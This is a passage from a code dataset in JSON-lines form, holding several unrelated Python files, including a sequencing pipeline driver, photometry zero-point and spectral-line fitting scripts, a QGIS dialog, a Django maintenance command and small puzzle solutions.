f.read()\n\t\t\torganization = eval(content)\n\t\t\tSRAObject = SRA.OrganizeData()\n\t\t\tGBKObject = GBK.OrganizeData()\n\t\t\torganization[\"SRA\"].update({SRA.DescriptiveName : {} })\n\t\t\torganization[\"GBK\"].update({GBK.LocusTag : {} })\n\t\t\torganization[\"SRA\"][SRA.DescriptiveName].update(SRAObject)\n\t\t\torganization[\"GBK\"][GBK.LocusTag].update(GBKObject)\n\t\t\tf.truncate(0)\n\t\t\tprint(organization,file=f)\t\t\n \t\t\n\ndef main(args):\n\n\tif hasattr(args,'process') and args.process is not None:\n\n\t\tInputSRA = SRA(args.name, args.accession)\n\t\tprint(\"SRA is downloaded\")\n\t\tInputGBK = GBK(args.gbk)\n\t\tprint(\"GBK is read\")\n\t\tInputGBK.MakeSAF()\n\t\tInputGBK.MakeNa(\"MIDDLE\")\n\t\tInputGBK.MakeFa(\"MIDDLE\")\n\t\tprint(\"GBK SAF is made\")\n\t\tInputSRA.TrimAccession()\n\t\tprint(\"SRA is trimmed\")\n\t\tInputSRA.BuildIndex(InputGBK)\n\t\tprint(\"Index is built\")\n\t\tInputSRA.bowtie2_align(InputGBK)\n\t\tprint(\"SRA Outputs retrieved\")\n\t\tInputSRA.FeatureCounts(InputGBK)\n\t\tprint(\"Featurecounts finished\")\n\t\tCacheData(InputSRA,InputGBK)\n\n\telif hasattr(args,'projectname') and args.projectname is not None:\n\t\tif args.FCountnames is None:\n\t\t\twith open('cache.txt', 'r+') as f:\n\t\t\t\tcontent = f.read()\n\t\t\t\torganization = eval(content)\n\t\t\tSRATable = {}\n\t\t\tfor i in range(0,len(args.list)):\n\t\t\t\tSRATable[i] = (SRA(organization[\"SRA\"][args.list[i]]))\n\t\t\tNewProject = Project(args.projectname,SRATable, \"SRA\")\n\t\telse:\n\t\t\tfcounts = {}\n\t\t\tfor i in range(0,len(args.list)):\n\t\t\t\tfcounts[args.FCountnames[i]] = args.list[i]\n\t\t\tNewProject = Project(args.projectname,fcounts, \"Fcount\",args.kegg)\n\t\tNewProject.MakeFCountDataFrame()\n\t\tNewProject.NormalizeReads()\n\t\tNewProject.CalculateTE()\n\t\tNewProject.MergeWithKegg()\n\telif hasattr(args,'get') and args.get is not None:\n\t\tInputGBK = GBK(args.input)\n\t\tif args.get == \"gbk_fa\":\n\t\t\tInputGBK.MakeFa(\"OUTPUT\")\n\t\telif args.get == \"gbk_na\":\n\t\t\tInputGBK.MakeNa(\"OUTPUT\")\n\t\telse:\n\t\t\tprint(\"No \\\"get\\\" option was selected\")\n\t\t\n\telse:\n\t\tprint(\"No option was selected\")\n\n\n\t\n\n\nif __name__ == \"__main__\":\n    args = parser()\n    main(args)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ehaddad05/Pipeline","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":4253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"31538433559","text":"# 5_B.py The Maximum Number of Overlaps\n# AC 0.72s 64720KB\n\nMAXPOS = 1000\n\ndef solve(n, rects):\n coords = [[0] * (MAXPOS + 1) for _ in range(MAXPOS + 1)]\n for x1, y1, x2, y2 in rects:\n coords[y1][x1] += 1\n coords[y1][x2] -= 1\n coords[y2][x1] -= 1\n coords[y2][x2] += 1\n\n for y in range(MAXPOS):\n for x in range(1, MAXPOS + 1):\n coords[y][x] += coords[y][x - 1]\n\n for y in range(1, MAXPOS + 1):\n for x in range(MAXPOS):\n coords[y][x] += coords[y - 1][x]\n\n return max(max(xs) for xs in coords)\n\nfrom sys import stdin\n\nn = int(stdin.readline())\nrects = [[int(e) for e in line.split()] for line in stdin.readlines()]\n\nprint(solve(n, rects))\n\n","repo_name":"koba925/alds","sub_path":"aoj/DSL/5_B.py","file_name":"5_B.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6466425656","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nModule implementing MarkerDialog.\n\"\"\"\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom qgis.utils import *\n\nfrom magicMarkers import MagicMarkers\nfrom colours import colourManager\n\nfrom Ui_marker_dialog import Ui_Dialog\n\n\nclass MarkerDialog(QDialog, Ui_Dialog):\n \"\"\"\n Class documentation goes here.\n \"\"\"\n def __init__(self, attribute, tableView, parent = None):\n \"\"\"\n Constructor\n \"\"\"\n QDialog.__init__(self, parent)\n self.setupUi(self)\n self.svgDict = None\n self.scene = None\n self.attribute = attribute\n self.tableView = tableView\n self.svgDict, self.scene = MagicMarkers().viewSVGs(self.SVGView)\n \n @pyqtSignature(\"\")\n def on_buttonBox_accepted(self):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n if self.svgDict != None:\n MagicMarkers().setSVG(\"tourist_attraction\", self.attribute , self.scene, self.svgDict)\n attractions = QgsMapLayerRegistry.instance().mapLayersByName(\"tourist_attraction\")[0]\n colourManager().makeClassTable(attractions, \"LEGEND\", self.tableView)\n\n self.close()\n \n @pyqtSignature(\"\")\n def on_buttonBox_rejected(self):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n self.close()\n \n @pyqtSignature(\"QString\")\n def on_comboBox_activated(self, p0):\n \"\"\"\n Slot documentation goes here.\n \"\"\"\n self.svgDict, self.scene = MagicMarkers().viewSVGs(self.SVGView)\n","repo_name":"Charlotteg/QGISforSchools","sub_path":"marker_dialog.py","file_name":"marker_dialog.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73953504871","text":"# Usei dicionario, sem nem saber oq era :I\ncores = {'red': '\\033[31m',\n 'clean': '\\033[m',\n 'green': '\\033[32m'}\n\nvalor = float(input('digite o valor do imovel: R$ '))\nsalario = float(input('digite o salario do comprador: R$ '))\nparcela = int(input('em quantas parcelas(anuais) será dividido: '))\nprestacao = (valor / parcela) / 12\nlimite = (salario * 30) / 100\nprint(f'Para ser pago em {parcela} anos, esse imovel com valor de {valor} R$'\n f' será cobrado em prestações de {prestacao:.2f} R$ por mês.')\nif prestacao >= limite:\n print(f'Emprestimo {cores[\"red\"]}NEGADO!')\nelse:\n print(f'{cores[\"green\"]}Emprestimo aceito!{cores[\"clean\"]}\\nParabens pelo seu novo imóvel ')\n","repo_name":"Acosmosss/Curso_em_Video_Python","sub_path":"Exercicios/Minhas Soluções(Comentado)/Mundo 2/Desafio 036.py","file_name":"Desafio 
036.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21003954998","text":"\"\"\"\nCalculate the zero points of the i-band and z-band\n\"\"\"\n\nimport os\nfrom typing import Tuple\nimport numpy as np\nimport pylab as plt\nfrom scipy.optimize import curve_fit\nimport pandas as pd\nfrom astropy.stats import sigma_clipped_stats\n\nfrom sex_catalog import SExtractorCat\nfrom k_constant import calculate_k_constant_mag\nimport plotting\n\n\ndef remove_outliers(array, sigma):\n \"\"\"returns a mask of values within the given sigma.\"\"\"\n median, std = np.median(array), np.std(array)\n good_idx = np.where((array >= median-sigma*std) & (array <= median + sigma*std))[0]\n return good_idx\n\ndef read_in_wide_band(sextractor_file_name: str, panstars_cat_name: str):\n \"\"\"Reading in the catalogs.\"\"\"\n decam_catalog = SExtractorCat(sextractor_file_name)\n decam_catalog, pan_cat = decam_catalog.cross_match_with_panstars(panstars_cat_name)\n return decam_catalog, pan_cat\n\ndef get_broad_band_mags(decam_df: pd.DataFrame, panstars_cat: pd.DataFrame, band: str) -> Tuple:\n \"\"\"Gets the magnitudes and errors for a wide-band filter.\"\"\"\n\n dec_mags = decam_df['MAG_APER'].values\n dec_mags_uncertainty = decam_df['MAGERR_APER'].values\n pan_mags = panstars_cat[f'{band}MeanPSFMag'].values\n pan_mags_uncertainty = panstars_cat[f'{band}MeanPSFMagErr'].values\n\n converted_mags, converted_mags_errors = CONVERT[band](panstars_cat)\n\n return dec_mags, dec_mags_uncertainty, converted_mags,\\\n converted_mags_errors, pan_mags, pan_mags_uncertainty\n\n\ndef convert_panstars_i_dec_mags(panstars_cat: pd.DataFrame):\n \"\"\"Converts the panstars magnitudes into decam magnitudes.\n see: https://des.ncsa.illinois.edu/releases/dr2/dr2-docs/dr2-transformations\"\"\"\n r_panstars_mags = panstars_cat['rMeanPSFMag'].values\n i_panstars_mags = panstars_cat['iMeanPSFMag'].values\n i_uncertainties = panstars_cat['iMeanPSFMagErr'].values\n r_uncertainties = panstars_cat['rMeanPSFMagErr'].values\n\n i_decam = i_panstars_mags - 0.155 * (r_panstars_mags - i_panstars_mags) + 0.015\n converted_i_uncertainties = np.hypot(\n i_uncertainties, 0.155*np.hypot(i_uncertainties, r_uncertainties))\n\n return i_decam, converted_i_uncertainties\n\n\ndef convert_panstars_z_dec_mags(panstars_cat: pd.DataFrame):\n \"\"\"Converts the panstars magnitudes into decam magnitudes.\n see: https://des.ncsa.illinois.edu/releases/dr2/dr2-docs/dr2-transformations\"\"\"\n r_panstars_mags = panstars_cat['rMeanPSFMag'].values\n i_panstars_mags = panstars_cat['iMeanPSFMag'].values\n z_panstars_mags = panstars_cat['zMeanPSFMag'].values\n i_uncertainties = panstars_cat['iMeanPSFMagErr'].values\n r_uncertainties = panstars_cat['rMeanPSFMagErr'].values\n z_uncertainties = panstars_cat['zMeanPSFMagErr'].values\n\n z_decam = z_panstars_mags - 0.114 * (r_panstars_mags - i_panstars_mags) - 0.010\n converted_z_uncertainties = np.hypot(\n z_uncertainties, 0.114*np.hypot(i_uncertainties, r_uncertainties))\n\n return z_decam, converted_z_uncertainties\n\n\nCONVERT = {\n 'i': convert_panstars_i_dec_mags,\n 'z': convert_panstars_z_dec_mags,\n}\n\ndef prepare_plotting_data(sextractor_file_name, panstars_file_name, band):\n \"\"\"Gets all the necessary variables for plotting ready and removes outliers.\"\"\"\n decam_catalog, panstars_catalog = read_in_wide_band(sextractor_file_name, panstars_file_name)\n mags = get_broad_band_mags(decam_catalog, panstars_catalog, 
band=band)\n msk = remove_outliers(mags[-2], sigma=2)\n cleaned_mags = [mag[msk] for mag in mags]\n return cleaned_mags\n\n\ndef straight_line(x_array, intercept):\n \"\"\"y=mx +c with m=1. Line for fitting to the zpt plot.\"\"\"\n return x_array + intercept\n\nclass BroadBand:\n \"\"\"\n Broad Band class for sorting the different magnitudes\n and determine the zpt.\n \"\"\"\n def __init__(self, panstars_cat_name: str, sextractor_cat_name: str, broadband: str):\n if broadband not in 'iz':\n raise ValueError('broadband needs to be either \"i\" or \"z\".')\n self.broadband = broadband\n self.sextractor_cat_name = sextractor_cat_name\n mags = prepare_plotting_data(sextractor_cat_name, panstars_cat_name, broadband)\n diffs = mags[2] - mags[0]\n diff_cut = np.where((diffs>30) & (diffs <32))[0] # specifically for this research.\n good_values = np.where(mags[2] < 100)[0] # Obviously not physical if this isn't met.\n other_good_values = np.where(mags[0] < -6)[0] # specific for decam\n more_good_values = np.where(mags[3] < 100)[0] # not physical to have errors more than 100 mags\n good_values = np.intersect1d(good_values, other_good_values)\n good_values = np.intersect1d(good_values, more_good_values)\n good_values = np.intersect1d(good_values, diff_cut)\n self.measured_mags = mags[0][good_values]\n self.measured_mags_err = mags[1][good_values]\n self.expected_mags = mags[2][good_values]\n self.expected_mags_err = mags[3][good_values]\n\n def plot_zpt(self):\n \"\"\"Plots the measured mags vs the expected mags.\"\"\"\n plotting.start_plot('DECam magnitudes [mag]', 'Expected magnitudes - DECam magnitudes [mags]')\n y_err = np.hypot(self.measured_mags_err, self.expected_mags_err)\n plt.errorbar(\n self.measured_mags, self.expected_mags - self.measured_mags,\n xerr=self.measured_mags_err, yerr=y_err,\n fmt='ko', alpha=0.3, ms=2.5, elinewidth=1.5)\n x_fit, fit, fit_up, fit_down = self.fit_horizontal_line()\n plt.plot(x_fit, fit, ls='--', color='r', lw=3, zorder=1)\n plt.fill_between(x_fit, fit_up, fit_down, alpha=.5, color='r')\n plotting.end_plot(f'plots/{self.broadband}_zpt.png')\n plt.show()\n\n def fit_straight_line(self) -> Tuple:\n \"\"\"Fitting y=x+c line to the data to determine c\"\"\"\n zpt, zpt_err = self.zero_point\n nstd = 5.\n popt_up = zpt + nstd * zpt_err\n popt_dw = zpt - nstd * zpt_err\n x_fit = np.linspace(np.sort(self.measured_mags)[0], np.sort(self.measured_mags)[-1])\n fit = straight_line(x_fit, zpt)\n fit_up = straight_line(x_fit, popt_up)\n fit_dw= straight_line(x_fit, popt_dw)\n return x_fit, fit, fit_up, fit_dw\n\n def fit_horizontal_line(self) ->Tuple:\n \"\"\"Fitting y = c line.\"\"\"\n zpt, zpt_err = self.zero_point[0], self.zero_point[1]\n nstd = 5.\n popt_up = zpt + nstd * zpt_err\n popt_dw = zpt - nstd * zpt_err\n x_fit = np.linspace(np.sort(self.measured_mags)[0], np.sort(self.measured_mags)[-1])\n fit = zpt * np.ones(len(x_fit))\n fit_up = popt_up * np.ones(len(x_fit))\n fit_down = popt_dw * np.ones(len(x_fit))\n return x_fit, fit, fit_up, fit_down\n\n @property\n def zero_point(self) -> Tuple[float, float]:\n \"\"\"\n Determines the zero point by fitting a straight line and determining the intercept.\n \"\"\"\n cut = np.where((self.measured_mags > -14) & (self.measured_mags < -11))\n a_fit, cov = curve_fit(\n straight_line, self.measured_mags[cut], self.expected_mags[cut],\n sigma=self.expected_mags_err[cut], absolute_sigma=True)\n uncertainties = np.sqrt(np.diag(cov))\n return a_fit[0], uncertainties[0]\n\n def determine_zero_point_prime(self, aperture_radius: float, 
seeing: float) -> float:\n \"\"\"\n This is the zero point minus the k_correction. This means that the magnitudes \n in the future would be determined by adding this constant to the k_correction\n which is dependent on the radius.\n\n Must provide the radius of the apertures used by sextractor to determine the magnitudes\n as well as the seeing of the image. Both must be in the same units.\n \"\"\"\n return self.zero_point[0] - calculate_k_constant_mag(aperture_radius, seeing)\n\n\nif __name__ == '__main__':\n INFILE_SEX_I = '../correct_stacks/N964/i.cat'\n INFILE_PAN_I = '../PANSTARS/PANSTARS_i.csv'\n INFILE_SEX_Z = '../correct_stacks/N964/z.cat'\n INFILE_PAN_Z = '../PANSTARS/PANSTARS_z.csv'\n\n INFILE_SEX_I_CDFS = '../CDFS_LAGER/i_cdfs_depth.cat'\n INFILE_PAN_I_CDFS = '../CDFS_LAGER/PANSTARS_i.csv'\n INFILE_SEX_Z_CDFS = '../CDFS_LAGER/z_cdfs_depth.cat'\n INFILE_PAN_Z_CDFS = '../CDFS_LAGER/PANSTARS_z.csv'\n\n SEEING_I = 1.17 # These comes from the seeing calculator.\n SEEING_Z = 1.23\n APERTURE_RADII = 1 #min kron radius\n\n SEEING_I_CDFS = 1.22\n SEEING_Z_CDFS = 1.14\n APERTURE_RADII_CDFS = 1 #min kron radius\n\n\n i_band_cdfs = BroadBand(INFILE_PAN_I_CDFS, INFILE_SEX_I_CDFS, 'i')\n print('i prime cdfs is: ', i_band_cdfs.determine_zero_point_prime(APERTURE_RADII_CDFS, SEEING_I_CDFS))\n i_band_cdfs.plot_zpt()\n os.system('mv plots/i_zpt.png plots/i_zpt_cdfs.png')\n\n z_band_cdfs = BroadBand(INFILE_PAN_Z_CDFS, INFILE_SEX_Z_CDFS, 'z')\n print('z prime cdfs is: ', z_band_cdfs.determine_zero_point_prime(APERTURE_RADII_CDFS, SEEING_Z_CDFS))\n z_band_cdfs.plot_zpt()\n os.system('mv plots/z_zpt.png plots/z_zpt_cdfs.png')\n\n i_band = BroadBand(INFILE_PAN_I, INFILE_SEX_I, 'i')\n print('i prime is: ', i_band.determine_zero_point_prime(APERTURE_RADII, SEEING_I))\n i_band.plot_zpt()\n\n z_band = BroadBand(INFILE_PAN_Z, INFILE_SEX_Z, 'z')\n print('z prime is: ', z_band.determine_zero_point_prime(APERTURE_RADII, SEEING_Z))\n z_band.plot_zpt()\n","repo_name":"TrystanScottLambert/DECam_Photometry","sub_path":"determine_broadband_zpts.py","file_name":"determine_broadband_zpts.py","file_ext":"py","file_size_in_byte":9350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5658118406","text":"import sys\n\ndef part2():\n lines = sys.stdin.readlines()\n sum = 0\n answer = 0\n table = {\n 0: 0\n }\n notFound = True\n while(notFound):\n for line in lines:\n num = int(line)\n sum += num\n print(\"Sum: \", sum, \"\\tNum: \", num)\n if not sum in table:\n table[sum] = 1\n else:\n table[sum] = table[sum] + 1\n if table[sum] >= 2:\n answer = sum\n notFound = False\n break\n\n print(answer)\n\ndef part1():\n sum = 0\n for line in sys.stdin:\n sum += int(line)\n\n print(sum)\n\ndef main():\n part2()\n\nif __name__ == \"__main__\":\n main()","repo_name":"McRaeAlex/AdventOfCode","sub_path":"2018/day1/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12726418895","text":"from django.core.management.base import BaseCommand\nfrom django.db.models import Count\n\nfrom lstv_api_v1.models import *\nfrom alive_progress import alive_bar\n\nfrom lstv_api_v1.tasks.tasks import job_recalc_weight, job_migrate_image_to_s3\nfrom lstv_api_v1.utils.utils import verify_resource_url, verify_image_url\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n for vs in VideoSource.objects.filter(thumbnail__isnull=True).all():\n 
image_url = None\n if vs.media_id:\n if vs.type == VideoTypeEnum.jwplayer:\n image_url = f\"https://content.jwplatform.com/thumbs/{vs.media_id}.jpg\"\n if vs.type == VideoTypeEnum.vimeo:\n image_url = f\"https://i.vimeocdn.com/video/{vs.media_id}_640.jpg\"\n if image_url and verify_image_url(image_url):\n new_image = Image(purpose=ImagePurposeTypes.thumbnail, legacy_url=image_url)\n new_image.save()\n vs.thumbnail = new_image\n vs.save()\n job_migrate_image_to_s3(new_image.id)\n print(f\"{vs.id} - {vs.type} - {image_url}\")\n else:\n print(f\"STILL NEED FIXING - {vs.id} - {vs.type} - {image_url}\")\n","repo_name":"Stevenpijei/wedding-site","sub_path":"lstv_be/lstv_api_v1/management/commands/job_fix_missing_thumbnails.py","file_name":"job_fix_missing_thumbnails.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31643034206","text":"COLOR_COUNT = 6\n\ndef calcScore(code, guess):\n assert(len(code) == len(guess))\n exact_match = 0\n for c,g in zip(code, guess):\n if c == g:\n exact_match += 1\n counts_c = [0] * COLOR_COUNT\n counts_g = [0] * COLOR_COUNT\n match_count = 0\n for c in code:\n counts_c[c] += 1\n for g in guess:\n counts_g[g] += 1\n for c, g in zip(counts_c, counts_g):\n match_count += min(c,g)\n match_count -= exact_match\n return (exact_match, match_count)\n\ndef isGuessConsistent(guesses, new_guess):\n for g, s in guesses:\n if calcScore(new_guess, g) != s:\n return False\n return True\n\ndef main():\n code = [0, 1, 0, 2]\n guesses = [\n [4,1,3,5],\n [1,2,3,4],\n [5,3,2,0],\n ]\n new_guess = [0,1,0,2]\n guesses = [(g, calcScore(code, g)) for g in guesses]\n # print(guesses)\n result = isGuessConsistent(guesses, new_guess)\n print(result)\n # score = calcScore(code, guess)\n # print(score)\n\nif __name__ == \"__main__\":\n main()","repo_name":"pavlik-y/Scratch","sub_path":"Mastermind/mastermind.py","file_name":"mastermind.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41045614297","text":"#!/scratch/mbarbier/miniconda3/bin/python3\n#\n# (c) mauro barbieri 2023\n# maurobarbieri.science@gmail.com\n#\n\n#********************************************************************************\n#\n# PROGRAM SETUP\n#\n#********************************************************************************\n\nimport os\nimport sys\nimport glob\nimport warnings\nimport logging\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import signal, interpolate, stats\nfrom scipy.signal import correlate, find_peaks, peak_widths\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.interpolate import interp1d\nfrom scipy.optimize import curve_fit\nimport astropy.units as u\nfrom astropy.io import fits\nfrom astropy import constants as const\nfrom astropy.coordinates import EarthLocation, SkyCoord, AltAz, get_body, get_sun, get_moon\nfrom astropy.time import Time\n\n\n# Filter the warning\nlogging.basicConfig(filename='error.log', level=logging.ERROR)\nwarnings.filterwarnings('ignore', category=UserWarning, append=True)\n\n\n#********************************************************************************\n#\n# FUNCTIONS\n#\n#********************************************************************************\n\n#placeholder for new functions\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\n#def funcname():\n# 
------------------------------ END FUNCTION ------------------------------ #\n\n\n\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef fit_absorption_line2(wavelengths, intensities, wc, ws):\n line_center0 = wc\n wl_span = ws\n mask = (wavelengths > (line_center0 - wl_span)) & (wavelengths < (line_center0 + wl_span))\n wl=wavelengths[mask]\n mf=np.mean(intensities[mask])\n flux_i = 1e6 - intensities[mask]\n flux = intensities[mask]\n npt=len(wavelengths[mask])\n \n \n smoothed_flux_i = gaussian_filter(flux_i, sigma=5)\n smoothed_flux0_i = gaussian_filter(flux_i, sigma=100)\n residuals_i = flux_i - smoothed_flux_i\n rms_i = np.sqrt(np.mean(residuals_i**2))\n threshold_i = 5 * rms_i\n peaks_i, properties_i = find_peaks(smoothed_flux_i, width=11, height=0.01)\n filtered_peaks_i = []\n for i, peak_i in enumerate(peaks_i):\n width_i = properties_i['widths'][i]\n peak_value_i = properties_i['peak_heights'][i]\n local_background_i = smoothed_flux0_i[peak_i]\n local_rms_i = rms_i\n if peak_value_i > local_background_i + 3 * local_rms_i and width_i > 11:\n filtered_peaks_i.append((peak_i, width_i, peak_value_i))\n \n # Sort filtered_peaks by width in descending order\n filtered_peaks_i.sort(key=lambda x: x[1], reverse=True)\n for i, (peak_i, width_i, peak_value_i) in enumerate(filtered_peaks_i, start=1):\n print(f\"{wl[peak_i]:7.2f},{width_i * 0.01:7.3f},{1-(1e6 - peak_value_i)/mf:5.2f}\")\n\n peak_indices_i = [peak_info[0] for peak_info in filtered_peaks_i]\n \n print('n peaks', len(filtered_peaks_i))\n\n# if filtered_peaks: \n# const_guess = np.mean(flux)\n# amplitude_guess = filtered_peaks[0][2]\n# mean_guess = wl[filtered_peaks[0][0]]\n# stddev_guess = filtered_peaks[0][1]\n# else: \n const_guess = np.mean(flux)\n amplitude_guess = np.min(flux) - const_guess\n mean_guess = line_center0\n stddev_guess = 0.2\n\n # Fit Gaussian\n ERRORE=0\n try:\n popt_gaussian, pcov = curve_fit(negative_gaussian, wl, flux, p0=[const_guess, amplitude_guess, mean_guess, stddev_guess], maxfev=2000)\n except RuntimeError as e:\n ERRORE = 1 # flag the failed fit (was misspelled ERORRE, which left ERRORE at 0)\n popt_gaussian = [np.nan for _ in range(4)]\n pcov = [[np.nan for _ in range(4)] for _ in range(4)]\n errors = [np.nan for _ in range(4)]\n sigma = np.nan # keep the names used downstream defined\n sigma_error = np.nan\n\n if ERRORE == 0:\n y_fit_gaussian = negative_gaussian(wl, *popt_gaussian)\n errors = np.sqrt(np.diag(pcov))\n continuum_g=popt_gaussian[0]\n amplitude_g=popt_gaussian[1]\n line_center_g=popt_gaussian[2]\n sigma=popt_gaussian[3]\n continuum_g_error = errors[0]\n amplitude_g_error = errors[1]\n line_center_g_error = errors[2]\n sigma_error = errors[3]\n\n # Fit Lorentzian\n ERRORE=0\n try:\n popt_lorentzian, pcov = curve_fit(negative_lorentzian, wl, flux, p0=[const_guess, amplitude_guess, mean_guess, stddev_guess], maxfev=2000)\n except RuntimeError as e:\n ERRORE = 1 # flag the failed fit (was misspelled ERORRE)\n popt_lorentzian = [np.nan for _ in range(4)]\n pcov = [[np.nan for _ in range(4)] for _ in range(4)]\n errors = [np.nan for _ in range(4)]\n delta_wl=np.nan\n rv=np.nan\n # NaN defaults so the final return statement stays defined on failure\n reduced_chisq=np.nan\n gamma=np.nan\n skewness=np.nan\n kurtosis=np.nan\n\n if ERRORE == 0:\n y_fit_lorentzian = negative_lorentzian(wl, *popt_lorentzian)\n errors = np.sqrt(np.diag(pcov))\n continuum=popt_lorentzian[0]\n amplitude=popt_lorentzian[1]\n line_center=popt_lorentzian[2]\n gamma=popt_lorentzian[3]\n continuum_error = errors[0]\n amplitude_error = errors[1]\n line_center_error = errors[2]\n gamma_error = errors[3]\n delta_wl=line_center0-popt_lorentzian[2]\n rv = (line_center/line_center0 - 1)*const.c.to(u.km/u.s).value\n\n mask1 = (wl > (line_center - 2 * gamma)) & (wl < (line_center + 2 * gamma))\n wl_subset=wl[mask1]\n flux_subset = 
flux[mask1]/continuum\n y_fit_lorentzian_subset = y_fit_lorentzian[mask1]/continuum\n residuals_fit = flux_subset - y_fit_lorentzian_subset\n rms_residuals = np.std(residuals_fit)\n snr=abs(amplitude/continuum)/rms_residuals\n chisq = np.sum((residuals_fit / np.std(flux_subset)) ** 2)\n dof = len(wl) - len(popt_lorentzian)\n reduced_chisq = chisq / dof\n ss_res = np.sum(residuals_fit ** 2)\n ss_tot = np.sum((flux_subset - np.mean(flux_subset)) ** 2)\n r_squared = 1 - (ss_res / ss_tot)\n flux1=1-flux_subset\n# flux1=flux_subset\n sum_flux = sum(flux1)\n npt_subset = len(flux_subset)\n skewness = sum(flux1[i] * (wl_subset[i] - line_center)**3 for i in range(npt_subset)) / (sum_flux * sigma**3)\n kurtosis = sum(flux1[i] * (wl_subset[i] - line_center)**4 for i in range(npt_subset)) / (sum_flux * sigma**4) - 3\n\n log=True\n if log == True:\n print('continuum ',continuum, continuum_error)\n print('intensity ',amplitude, amplitude_error)\n print('central wavelength',line_center,line_center_error)\n print('gamma = width ',gamma, gamma_error)\n print('sigma = width ',sigma, sigma_error)\n print('skewness ',skewness)\n print('kurtosis ',kurtosis)\n print('rms residuals ',rms_residuals)\n print('SNR ',snr)\n print('chi2 ',reduced_chisq)\n print('R2 ',r_squared)\n print('delta wavelength ',delta_wl)\n print('RV ',rv)\n \n plot = True\n if plot == True:\n # Use these indices to extract the corresponding wavelengths and fluxes\n peak_wavelengths = wl[peak_indices_i]\n peak_fluxes = flux[peak_indices_i] / continuum\n x1 = line_center0 - wl_span\n x2 = line_center0 + wl_span\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, gridspec_kw={'height_ratios': [3, 1]})\n manager = plt.get_current_fig_manager()\n manager.window.wm_geometry(\"1200x600+0+0\")\n ax1.plot(wl,flux/continuum, label='Data')\n #ax1.plot(wl,1-smoothed_flux/continuum, label='Data')\n #ax1.plot(wl,1-smoothed_flux0/continuum, label='Data')\n ax1.plot(wl, 1-y_fit_lorentzian/continuum, label='Lorentzian Fit', linestyle='dashed')\n ax1.axvline(line_center0, color='black', linestyle='dashed', label='Center')\n ax1.axvline(line_center-gamma, color='red', linestyle='dashed', label='Center')\n ax1.axvline(line_center+gamma, color='red', linestyle='dashed', label='Center')\n ax1.plot(peak_wavelengths, 1-peak_fluxes, 'o', label='Peaks')\n ax1.set_xlim(x1, x2)\n ax1.set_ylabel('Flux')\n ax1.grid(True)\n ax2.plot(wl, residuals_fit/continuum, label='Residuals')\n ax2.plot(wl, (flux-y_fit_lorentzian)/continuum, label='Residuals')\n ax2.axvline(line_center0, color='black', linestyle='dashed', label='Center')\n ax2.axvline(line_center-gamma, color='red', linestyle='dashed', label='Center')\n ax2.axvline(line_center+gamma, color='red', linestyle='dashed', label='Center')\n ax2.set_xlim(x1, x2)\n ax2.set_xlabel('Wavelength [AA]')\n ax2.set_ylabel('Residuals')\n ax2.grid(True)\n plt.tight_layout()\n plt.show()\n else:\n figatomare = True\n\n return rv,reduced_chisq,gamma,skewness,kurtosis\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef convert_to_air_wavelengths(wavelengths_vac):\n #Convert vacuum wavelengths to air wavelengths using the formula\n #from Donald Morton (2000, ApJ. 
Suppl., 130, 403)\n #n = 1 + 0.0000834254 + 0.02406147 / (130 - s2) + 0.00015998 / (38.9 - s2), where s = 10^4 / λvac and λvac is in Ångströms.\n #The conversion is then: λair = λvac / n.\n #see https://www.astro.uu.se/valdwiki/Air-to-vacuum%20conversion\n \n # Calculate s squared\n s = 10**4 / wavelengths_vac\n s2 = s**2\n # Calculate the refractive index\n n = 1 + 0.0000834254 + 0.02406147 / (130 - s2) + 0.00015998 / (38.9 - s2)\n # Convert to air wavelengths\n wavelengths_air = wavelengths_vac / n\n \n return wavelengths_air\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef negative_gaussian(x, const, amplitude, mean, stddev):\n gauss = const - amplitude * np.exp(-((x - mean) / stddev) ** 2)\n return gauss\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef negative_lorentzian(x, const, amplitude, x0, gamma):\n lorentz = const - amplitude * (gamma / ((x - x0)**2 + gamma**2))\n return lorentz\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef fit_absorption_line(wavelengths, intensities, wc, ws, flagd):\n plot=flagd\n log=flagd\n line_center0 = wc\n wl_span = ws\n mask = (wavelengths > (line_center0 - wl_span)) & (wavelengths < (line_center0 + wl_span))\n wl=wavelengths[mask]\n flux = intensities[mask]\n npt=len(wavelengths[mask])\n \n #for attempt 